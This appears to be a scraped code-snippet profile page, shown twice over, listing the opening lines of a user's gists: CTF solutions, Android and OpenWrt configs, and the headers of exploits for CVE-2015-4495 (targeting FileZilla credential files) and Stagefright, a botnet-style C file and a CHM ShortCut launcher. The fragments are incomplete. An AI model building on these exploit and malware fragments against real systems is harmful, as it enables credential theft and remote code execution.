Toufik Airane toufik-airane

## airbus1.py
#!/usr/bin/python
a = '\x3e\x5f\x1a\x3b\x53\x52\x30\x35\x13\x09\x1e'
b = 'Good boy :)'
print ''.join(chr(ord(i)^ord(j)) for i,j in zip(a,b))
# str().join(map(lambda x,y: chr(ord(x)^ord(y)),"string1","string2"))

## MainActivity.java
public class MainActivity extends ActionBarActivity {

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);

        Profiler p = new Profiler();
        p.profileClass("com.android.internal.telephony.IccSmsInterfaceManager");
        p.profileClass("com.android.internal.telephony.Phone");

## gen_keystore
#!/bin/sh
####
# Example :
# ./gen_keystore platform.x509.pem platform.pk8 android platform system.cyanogenmod.keystore
####
echo "$0 <.pem file> <.pk8 file> <password> <alias> <output>"
if test $# -ne 5; then
    echo "[Error] Invalid arguments"
    exit 1
fi

## opkg.conf
# OpenWrt Barrier Breaker r41293
dest root /
dest ram /tmp
lists_dir ext /var/opkg-lists
option overlay_root /overlay
src/gz barrier_breaker_base http://downloads.openwrt.org/barrier_breaker/14.07/ar71xx/generic/packages/base/
src/gz barrier_breaker_luci http://downloads.openwrt.org/barrier_breaker/14.07/ar71xx/generic/packages/luci/
src/gz barrier_breaker_management http://downloads.openwrt.org/barrier_breaker/14.07/ar71xx/generic/packages/management/
src/gz barrier_breaker_oldpackages http://downloads.openwrt.org/barrier_breaker/14.07/ar71xx/generic/packages/oldpackages/
src/gz barrier_breaker_packages http://downloads.openwrt.org/barrier_breaker/14.07/ar71xx/generic/packages/packages/

## rev150.gdb
# BreizhCTF2015 Reverse me ! (150pts) Solution
shell python -c "print'a'*42" > /tmp/in
# cmp    dl, al
b*0x080485c7
command
set $eax=$edx
append value /tmp/flag.log $eax
c
end
r < /tmp/in

## CVE-2015-4495.js
// JS/Exploit.CVE-2015-4495
// This exploit has been found in the wild. I'm not the author (@tfairane).
{
    clearInterval(intVal);
    var q = queue(1);
    var tasks = [];
    var !os = navigator.platform;
    if (os.search('Win') > -1) tasks = [function(callback) {
        var interesting_apps = {
            "FileZilla": ["filezilla.xml", "sitemanager.xml", "recentservers.xml"],

## Stagefright_CVE-2015-1538-1_Exploit.py
#!/usr/bin/env python
# Joshua J. Drake (@jduck) of ZIMPERIUM zLabs
# Shout outs to our friends at Optiv (formerly Accuvant Labs)
# (C) Joshua J. Drake, ZIMPERIUM Inc, Mobile Threat Protection, 2015
# www.zimperium.com
#
# Exploit for RCE Vulnerability CVE-2015-1538 #1
# Integer Overflow in the libstagefright MP4 'stsc' atom handling
#
# Don't forget, the output of "create_mp4" can be delivered many ways!

## s.c
//     ___      __ _
//    /   \___ / _(_)_ __   ___  ___
//   / /\ / _ \ |_| | '_ \ / _ \/ __|
//  / /_//  __/  _| | | | |  __/\__ \
// /___,' \___|_| |_|_| |_|\___||___/

#define PR_SET_NAME 15
#define SERVER_LIST_SIZE (sizeof(commServer) / sizeof(unsigned char *))
#define PAD_RIGHT 1
#define PAD_ZERO 2

## a.chm
<HTML>
<TITLE>Check for Windows updates from Command Line</TITLE>
<HEAD>
</HEAD>
<body><script language="javascript">
if ((window.name != "content") && (navigator.userAgent.indexOf("Opera") <= -1) )
document.write("<center><a href='index.html?page=doc.htm'>show framing</a></center>")
</script>
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">

## rhino.sandbox.warning.log
Problem when trying to get a Rhino object: java.lang.SecurityException: Illegal access in sandbox to public GlideScriptable GlideSystemUtilScript: com.glide.script.RhinoEnvironment.checkScriptableAccess(RhinoEnvironment.java:562)
com.glide.script.ARhinoScope.checkScriptableAccess(ARhinoScope.java:96)
com.glide.script.ARhinoScope.get(ARhinoScope.java:85)
com.glide.script.RhinoScope.get(RhinoScope.java:51)
com.glide.script.RhinoSandboxScope.get(RhinoSandboxScope.java:54)
org.mozilla.javascript.ScriptableObject.getProperty(ScriptableObject.java:1478)
org.mozilla.javascript.Context.newObject(Context.java:1098)
com.glide.script.RhinoObject.<init>(RhinoObject.java:57)
com.glide.script.RhinoObject.<init>(RhinoObject.java:49)
com.glide.script.GlideRhinoObject.<init>(GlideRhinoObject.java:39)
	#!/usr/bin/python
	a = '\x3e\x5f\x1a\x3b\x53\x52\x30\x35\x13\x09\x1e'
	b = 'Good boy :)'
	print ''.join(chr(ord(i)^ord(j)) for i,j in zip(a,b))
	# str().join(map(lambda x,y: chr(ord(x)^ord(y)),"string1","string2"))
	public class MainActivity extends ActionBarActivity {

	@Override
	protected void onCreate(Bundle savedInstanceState) {
	super.onCreate(savedInstanceState);
	setContentView(R.layout.activity_main);

	Profiler p = new Profiler();
	p.profileClass("com.android.internal.telephony.IccSmsInterfaceManager");
	p.profileClass("com.android.internal.telephony.Phone");
	#!/bin/sh
	####
	# Example :
	# ./gen_keystore platform.x509.pem platform.pk8 android platform system.cyanogenmod.keystore
	####
	echo "$0 <.pem file> <.pk8 file> <password> <alias> <output>"
	if test $# -ne 5; then
	echo "[Error] Invalid arguments"
	exit 1
	fi
	# OpenWrt Barrier Breaker r41293
	dest root /
	dest ram /tmp
	lists_dir ext /var/opkg-lists
	option overlay_root /overlay
	src/gz barrier_breaker_base http://downloads.openwrt.org/barrier_breaker/14.07/ar71xx/generic/packages/base/
	src/gz barrier_breaker_luci http://downloads.openwrt.org/barrier_breaker/14.07/ar71xx/generic/packages/luci/
	src/gz barrier_breaker_management http://downloads.openwrt.org/barrier_breaker/14.07/ar71xx/generic/packages/management/
	src/gz barrier_breaker_oldpackages http://downloads.openwrt.org/barrier_breaker/14.07/ar71xx/generic/packages/oldpackages/
	src/gz barrier_breaker_packages http://downloads.openwrt.org/barrier_breaker/14.07/ar71xx/generic/packages/packages/
	# BreizhCTF2015 Reverse me ! (150pts) Solution
	shell python -c "print'a'*42" > /tmp/in
	# cmp dl, al
	b*0x080485c7
	command
	set $eax=$edx
	append value /tmp/flag.log $eax
	c
	end
	r < /tmp/in
	// JS/Exploit.CVE-2015-4495
	// This exploit has been found in the wild. I'm not the author (@tfairane).
	{
	clearInterval(intVal);
	var q = queue(1);
	var tasks = [];
	var !os = navigator.platform;
	if (os.search('Win') > -1) tasks = [function(callback) {
	var interesting_apps = {
	"FileZilla": ["filezilla.xml", "sitemanager.xml", "recentservers.xml"],
	#!/usr/bin/env python
	# Joshua J. Drake (@jduck) of ZIMPERIUM zLabs
	# Shout outs to our friends at Optiv (formerly Accuvant Labs)
	# (C) Joshua J. Drake, ZIMPERIUM Inc, Mobile Threat Protection, 2015
	# www.zimperium.com
	#
	# Exploit for RCE Vulnerability CVE-2015-1538 #1
	# Integer Overflow in the libstagefright MP4 'stsc' atom handling
	#
	# Don't forget, the output of "create_mp4" can be delivered many ways!
	// ___ __ _
	// / \___ / _(_)_ __ ___ ___
	// / /\ / _ \ \|_\| \| '_ \ / _ \/ __\|
	// / /_// __/ _\| \| \| \| \| __/\__ \
	// /___,' \___\|_\| \|_\|_\| \|_\|\___\|\|___/

	#define PR_SET_NAME 15
	#define SERVER_LIST_SIZE (sizeof(commServer) / sizeof(unsigned char *))
	#define PAD_RIGHT 1
	#define PAD_ZERO 2
	<HTML>
	<TITLE>Check for Windows updates from Command Line</TITLE>
	<HEAD>
	</HEAD>
	<body><script language="javascript">
	if ((window.name != "content") && (navigator.userAgent.indexOf("Opera") <= -1) )
	document.write("<center><a href='index.html?page=doc.htm'>show framing</a></center>")
	</script>
	<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
	<PARAM name="Command" value="ShortCut">
	Problem when trying to get a Rhino object: java.lang.SecurityException: Illegal access in sandbox to public GlideScriptable GlideSystemUtilScript: com.glide.script.RhinoEnvironment.checkScriptableAccess(RhinoEnvironment.java:562)
	com.glide.script.ARhinoScope.checkScriptableAccess(ARhinoScope.java:96)
	com.glide.script.ARhinoScope.get(ARhinoScope.java:85)
	com.glide.script.RhinoScope.get(RhinoScope.java:51)
	com.glide.script.RhinoSandboxScope.get(RhinoSandboxScope.java:54)
	org.mozilla.javascript.ScriptableObject.getProperty(ScriptableObject.java:1478)
	org.mozilla.javascript.Context.newObject(Context.java:1098)
	com.glide.script.RhinoObject.<init>(RhinoObject.java:57)
	com.glide.script.RhinoObject.<init>(RhinoObject.java:49)
	com.glide.script.GlideRhinoObject.<init>(GlideRhinoObject.java:39)